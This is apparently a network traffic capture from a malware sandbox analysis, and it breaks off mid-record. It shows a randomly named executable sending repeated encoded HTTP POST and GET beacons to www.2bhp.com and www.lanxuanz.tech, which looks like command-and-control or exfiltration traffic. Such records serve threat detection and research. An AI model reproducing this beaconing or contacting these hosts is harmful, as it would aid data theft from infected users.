                                                                    Jan 11, 2025 06:33:03.593400002 CET250INData Raw: 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 70 3e 50 6c 65 61 73 65 20 63
                                                                    Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.84973485.233.160.22805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:33:08.706007957 CET763OUTPOST /9hv6/ HTTP/1.1
                                                                    Host: www.2bhp.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.2bhp.com
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.2bhp.com/9hv6/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 74 69 34 6f 72 4a 45 58 6f 54 4b 63 30 78 67 56 31 32 48 44 2b 48 53 34 39 54 30 4e 78 77 49 79 49 32 34 6c 41 76 63 77 46 7a 79 56 46 75 54 38 52 2b 2f 58 36 62 66 78 51 2b 50 6a 74 47 42 30 44 4b 59 2f 69 59 34 44 57 63 49 66 45 70 5a 58 7a 64 48 55 75 36 74 78 76 33 69 43 68 79 46 35 43 4a 62 69 54 6b 32 53 64 6d 64 41 59 35 4e 62 59 37 62 43 64 73 54 4f 48 55 77 32 7a 39 7a 5a 33 6a 39 51 6b 5a 4c 2b 43 4b 57 52 50 76 63 38 54 58 79 2b 50 6d 45 5a 55 53 57 59 50 71 63 67 6a 4d 78 71 35 50 55 38 43 6a 2b 77 48 4d 59 6f 41 62 4e 38 4a 43 57 65 2b 47 61 77 55 6e 4c 4e 42 6c 56 53 52 58 59 3d
                                                                    Data Ascii: 1ZqD=ti4orJEXoTKc0xgV12HD+HS49T0NxwIyI24lAvcwFzyVFuT8R+/X6bfxQ+PjtGB0DKY/iY4DWcIfEpZXzdHUu6txv3iChyF5CJbiTk2SdmdAY5NbY7bCdsTOHUw2z9zZ3j9QkZL+CKWRPvc8TXy+PmEZUSWYPqcgjMxq5PU8Cj+wHMYoAbN8JCWe+GawUnLNBlVSRXY=
                                                                    Jan 11, 2025 06:33:09.301889896 CET174INHTTP/1.0 303 See Other
                                                                    Date: Sat, 11 Jan 2025 05:33:09 GMT
                                                                    Server: Forwarding
                                                                    Location: /
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.84973585.233.160.22805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:33:11.255626917 CET783OUTPOST /9hv6/ HTTP/1.1
                                                                    Host: www.2bhp.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.2bhp.com
                                                                    Connection: close
                                                                    Content-Length: 225
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.2bhp.com/9hv6/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 74 69 34 6f 72 4a 45 58 6f 54 4b 63 37 78 51 56 33 52 54 44 32 48 53 37 68 6a 30 4e 37 51 49 2b 49 32 30 6c 41 71 6b 67 43 41 57 56 46 50 6a 38 51 2f 2f 58 33 37 66 78 62 65 50 69 67 6d 42 37 44 4b 55 47 69 61 38 44 57 63 4d 66 45 6f 46 58 7a 73 48 58 75 71 74 7a 6b 58 69 41 6c 79 46 35 43 4a 62 69 54 6b 53 6f 64 6d 56 41 59 4a 64 62 62 66 48 64 44 63 54 4e 51 6b 77 32 6c 4e 7a 56 33 6a 39 32 6b 59 58 59 43 4a 75 52 50 71 34 38 53 47 79 39 57 32 45 66 5a 79 58 75 42 71 39 31 6b 63 52 37 34 2b 30 69 4f 41 6a 55 50 61 31 43 61 35 46 36 4b 43 2b 31 2b 46 79 47 52 51 57 6c 62 47 46 69 50 41 4d 6f 39 4b 7a 4b 42 2b 64 58 4e 75 30 5a 50 75 2f 33 70 34 57 74
                                                                    Data Ascii: 1ZqD=ti4orJEXoTKc7xQV3RTD2HS7hj0N7QI+I20lAqkgCAWVFPj8Q//X37fxbePigmB7DKUGia8DWcMfEoFXzsHXuqtzkXiAlyF5CJbiTkSodmVAYJdbbfHdDcTNQkw2lNzV3j92kYXYCJuRPq48SGy9W2EfZyXuBq91kcR74+0iOAjUPa1Ca5F6KC+1+FyGRQWlbGFiPAMo9KzKB+dXNu0ZPu/3p4Wt
                                                                    Jan 11, 2025 06:33:11.836436987 CET174INHTTP/1.0 303 See Other
                                                                    Date: Sat, 11 Jan 2025 05:33:11 GMT
                                                                    Server: Forwarding
                                                                    Location: /
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.84973685.233.160.22805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:33:13.805814028 CET1800OUTPOST /9hv6/ HTTP/1.1
                                                                    Host: www.2bhp.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.2bhp.com
                                                                    Connection: close
                                                                    Content-Length: 1241
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.2bhp.com/9hv6/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 74 69 34 6f 72 4a 45 58 6f 54 4b 63 37 78 51 56 33 52 54 44 32 48 53 37 68 6a 30 4e 37 51 49 2b 49 32 30 6c 41 71 6b 67 43 41 65 56 47 35 58 38 52 63 6e 58 32 37 66 78 48 75 50 6e 67 6d 42 69 44 4b 4d 43 69 61 78 2b 57 5a 51 66 46 4b 68 58 31 65 2f 58 67 71 74 7a 72 33 69 42 68 79 46 6f 43 49 72 6d 54 6b 69 6f 64 6d 56 41 59 4c 56 62 50 37 62 64 42 63 54 4f 48 55 77 69 7a 39 7a 35 33 6a 30 44 6b 59 44 58 43 34 4f 52 50 4b 6f 38 51 30 71 39 4a 6d 45 64 59 79 58 6d 42 71 77 6c 6b 63 4d 4b 34 2b 41 45 4f 41 62 55 66 2f 56 42 66 64 56 4e 57 6b 32 56 6e 46 61 42 50 6a 32 31 5a 46 46 49 4c 77 51 39 36 76 37 79 4b 49 68 59 48 2b 6c 46 53 5a 72 4b 76 74 79 6c 41 43 51 59 4b 31 67 50 34 69 71 44 4a 6e 55 45 72 73 31 41 2b 79 74 6b 49 54 52 2b 7a 6b 36 78 58 75 34 53 42 59 2f 31 6b 30 4c 79 6a 62 58 42 44 56 6c 43 68 56 6b 6e 54 64 71 74 72 50 59 44 63 49 4c 70 49 6d 72 59 2b 70 4f 49 4d 2b 71 6c 2f 47 51 43 73 35 4d 72 50 35 2f 70 44 71 6b 32 47 43 5a 48 4d 5a 39 74 54 4f 65 46 67 32 37 4c 4b [TRUNCATED]
                                                                    Data Ascii: 1ZqD=ti4orJEXoTKc7xQV3RTD2HS7hj0N7QI+I20lAqkgCAeVG5X8RcnX27fxHuPngmBiDKMCiax+WZQfFKhX1e/Xgqtzr3iBhyFoCIrmTkiodmVAYLVbP7bdBcTOHUwiz9z53j0DkYDXC4ORPKo8Q0q9JmEdYyXmBqwlkcMK4+AEOAbUf/VBfdVNWk2VnFaBPj21ZFFILwQ96v7yKIhYH+lFSZrKvtylACQYK1gP4iqDJnUErs1A+ytkITR+zk6xXu4SBY/1k0LyjbXBDVlChVknTdqtrPYDcILpImrY+pOIM+ql/GQCs5MrP5/pDqk2GCZHMZ9tTOeFg27LKkowhmQxUBcdFf3BKa5HL524EY5kTc/oxF+pdOnq3NzDgJbcrJcD6o6xI9d2X6leJuY07CF4QKZ9xxNiJsWTyf2kk49+2EiIYrjNsJZNr8FxMnVSazOoIWWgy8zHt3+qGejgJ9okQtjFuRdNfVdQxArJV9qokzzMZnzARa4Gv4NHGflzbkCWs0f21Sax0KB889g9rOAInhqC0bHBCb8pnv0CEtM5+XuPkRg/l1mEaG3Q8BYAz0FMk6pgpLpB8WIKdIpVShlqMLLNFlqnKKvGeK3icSyVvkJJDPUwEVrLRsD8zL6wUhT+ONMrrlIOv5AeZEccVfGLvPelBcb7iH5FYmsuA5jp8qYhF0DDitkSrbgG8MvpTh5Udvzl+b1QPdcq1P5s9FlyQXsKKyDGYFO75iApDBZaA27y+AjGP46QF3C1J4IM/OmyL/MF+tsvvR3kQMhsX4/2Y+TxtG2sl7I8/OZGfeJwev9PPxLNllORoDK730WWq61K2GttEd5SYprpCz0IgVIMjR4jOApH9F0XI9POm1x7PdecCBqUWdfstlj/JPy4BKGwxd5kSH9eR6H7bvgOpfKwgqigUd8qbQYouRg5txoUoNyHbwJRC/3ICpbNYvxWLf5T+vRtSmrmmam566ptmyhjaFen6qRnGdNAalo91KgWS7vsR1V [TRUNCATED]
                                                                    Jan 11, 2025 06:33:14.379079103 CET174INHTTP/1.0 303 See Other
                                                                    Date: Sat, 11 Jan 2025 05:33:14 GMT
                                                                    Server: Forwarding
                                                                    Location: /
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.84973785.233.160.22805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:33:16.348191023 CET510OUTGET /9hv6/?1ZqD=ggQIo5gV7zHF4RoJrW67zXedyj4Z9AdEETJPM44fUDmvE5zVPN+96oHBfd6Q3012XKsPi7h4Ls5HOMc1y+WXq6tX0X203QdCFZPEDkOrZS9vV9N9P/Prcpb0HgUUjs6D2w==&dbFX6=JLnL0 HTTP/1.1
                                                                    Host: www.2bhp.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Jan 11, 2025 06:33:16.923230886 CET174INHTTP/1.0 303 See Other
                                                                    Date: Sat, 11 Jan 2025 05:33:16 GMT
                                                                    Server: Forwarding
                                                                    Location: /
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.849738136.143.186.12805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:33:22.182205915 CET778OUTPOST /m8yb/ HTTP/1.1
                                                                    Host: www.lanxuanz.tech
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.lanxuanz.tech
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.lanxuanz.tech/m8yb/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 6f 6e 73 2f 65 34 49 39 65 7a 67 50 78 39 4b 30 4a 31 71 75 50 47 51 79 61 36 78 4f 57 5a 57 33 7a 35 30 2f 77 42 65 79 31 2b 65 73 33 75 56 61 4a 79 74 4b 70 38 6a 6d 39 54 2f 77 65 6f 43 50 69 72 4b 50 6a 71 57 74 41 41 55 72 59 42 37 4a 73 2f 56 51 46 4a 47 45 53 68 67 70 76 41 64 6c 58 55 56 53 38 67 71 65 30 77 79 72 46 76 77 68 31 56 43 75 57 6a 49 6e 79 5a 4e 31 55 46 76 72 79 62 38 46 6c 58 38 51 37 6f 46 34 6f 4b 4d 4d 58 71 2f 37 33 4f 46 41 51 66 78 4a 2b 58 65 32 34 50 4d 34 45 57 2f 6c 6f 41 63 74 58 64 4b 5a 7a 69 48 4c 38 42 57 47 4e 65 2f 73 37 31 47 68 63 6f 47 55 38 6f 6f 3d
                                                                    Data Ascii: 1ZqD=ons/e4I9ezgPx9K0J1quPGQya6xOWZW3z50/wBey1+es3uVaJytKp8jm9T/weoCPirKPjqWtAAUrYB7Js/VQFJGEShgpvAdlXUVS8gqe0wyrFvwh1VCuWjInyZN1UFvryb8FlX8Q7oF4oKMMXq/73OFAQfxJ+Xe24PM4EW/loActXdKZziHL8BWGNe/s71GhcoGU8oo=
                                                                    Jan 11, 2025 06:33:22.781953096 CET1236INHTTP/1.1 404
                                                                    Server: ZGS
                                                                    Date: Sat, 11 Jan 2025 05:33:22 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: zalb_8ae64e9492=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/
                                                                    Set-Cookie: csrfc=90c63295-96eb-4623-94ab-b0d7feb8b388;path=/;priority=high
                                                                    Set-Cookie: _zcsr_tmp=90c63295-96eb-4623-94ab-b0d7feb8b388;path=/;SameSite=Strict;priority=high
                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                    vary: accept-encoding
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 37 35 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cc 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                                    Data Ascii: 575X[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                                    Jan 11, 2025 06:33:22.781972885 CET729INData Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                                    Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.849739136.143.186.12805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:33:24.724750996 CET798OUTPOST /m8yb/ HTTP/1.1
                                                                    Host: www.lanxuanz.tech
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.lanxuanz.tech
                                                                    Connection: close
                                                                    Content-Length: 225
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.lanxuanz.tech/m8yb/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 6f 6e 73 2f 65 34 49 39 65 7a 67 50 77 63 36 30 4c 53 47 75 65 32 51 31 57 61 78 4f 50 4a 57 72 7a 35 34 2f 77 41 72 2f 31 4e 36 73 33 4b 52 61 62 78 31 4b 71 38 6a 6d 33 7a 2f 2f 42 59 43 49 69 71 32 70 6a 72 71 74 41 41 41 72 59 45 58 4a 73 49 35 54 46 5a 47 43 4b 52 67 72 73 77 64 6c 58 55 56 53 38 67 50 37 30 30 65 72 46 2f 67 68 31 33 36 76 56 6a 49 6b 6b 4a 4e 31 44 56 75 44 79 62 38 72 6c 57 67 36 37 71 74 34 6f 49 45 4d 58 62 2f 36 2b 4f 46 4f 65 2f 77 56 33 6d 50 79 2f 4d 49 61 4a 77 57 4b 6e 54 4d 34 66 4c 6e 7a 70 41 50 4e 2f 42 2b 74 4e 64 58 61 2b 43 62 4a 47 4c 57 6b 69 2f 39 49 66 50 6c 74 6e 38 4e 71 39 79 6f 6b 6f 74 55 4a 72 30 4b 76
                                                                    Data Ascii: 1ZqD=ons/e4I9ezgPwc60LSGue2Q1WaxOPJWrz54/wAr/1N6s3KRabx1Kq8jm3z//BYCIiq2pjrqtAAArYEXJsI5TFZGCKRgrswdlXUVS8gP700erF/gh136vVjIkkJN1DVuDyb8rlWg67qt4oIEMXb/6+OFOe/wV3mPy/MIaJwWKnTM4fLnzpAPN/B+tNdXa+CbJGLWki/9IfPltn8Nq9yokotUJr0Kv
                                                                    Jan 11, 2025 06:33:25.301229954 CET1236INHTTP/1.1 404
                                                                    Server: ZGS
                                                                    Date: Sat, 11 Jan 2025 05:33:25 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: zalb_8ae64e9492=d2341ff8556820e5fe7583c4c06e32ae; Path=/
                                                                    Set-Cookie: csrfc=781e121b-83c6-4b96-9eeb-9dbb57981cc6;path=/;priority=high
                                                                    Set-Cookie: _zcsr_tmp=781e121b-83c6-4b96-9eeb-9dbb57981cc6;path=/;SameSite=Strict;priority=high
                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                    vary: accept-encoding
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 37 35 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cc 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                                    Data Ascii: 575X[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                                    Jan 11, 2025 06:33:25.301256895 CET729INData Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                                    Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.849740136.143.186.12805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:33:27.349263906 CET1815OUTPOST /m8yb/ HTTP/1.1
                                                                    Host: www.lanxuanz.tech
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.lanxuanz.tech
                                                                    Connection: close
                                                                    Content-Length: 1241
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.lanxuanz.tech/m8yb/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 6f 6e 73 2f 65 34 49 39 65 7a 67 50 77 63 36 30 4c 53 47 75 65 32 51 31 57 61 78 4f 50 4a 57 72 7a 35 34 2f 77 41 72 2f 31 4e 79 73 33 66 46 61 59 52 4a 4b 72 38 6a 6d 30 7a 2f 38 42 59 44 4e 69 72 65 31 6a 72 6e 59 41 43 34 72 5a 6d 66 4a 39 74 4e 54 50 5a 47 43 57 68 67 6f 76 41 64 56 58 56 6c 4f 38 67 66 37 30 30 65 72 46 35 6b 68 33 6c 43 76 54 6a 49 6e 79 5a 4e 44 55 46 75 34 79 62 30 64 6c 57 6b 41 38 61 4e 34 6f 6f 55 4d 45 35 48 36 6d 65 46 4d 5a 2f 77 64 33 6d 44 39 2f 49 51 38 4a 30 66 58 6e 54 6b 34 4f 74 69 2b 2b 79 6e 50 70 33 2b 44 4c 61 50 35 67 31 54 77 62 4e 72 66 6a 75 51 79 59 76 39 46 75 4f 55 6e 32 46 31 4c 78 70 6b 6f 73 44 50 6a 74 76 4f 6e 72 7a 77 55 63 6d 6a 71 51 30 6d 4f 4a 4b 64 4f 63 65 45 36 38 31 56 61 47 43 33 77 6a 2b 72 61 62 6e 33 76 2f 44 6c 4b 39 53 55 54 53 53 4b 73 31 38 5a 68 64 57 63 2f 56 6e 65 79 42 74 35 44 53 6f 79 55 66 2f 73 6e 56 43 44 42 38 48 4c 4b 42 34 70 4b 38 6c 4e 4c 37 51 7a 58 4b 45 6f 6f 41 63 48 42 2f 79 51 4f 52 45 39 34 75 [TRUNCATED]
                                                                    Data Ascii: 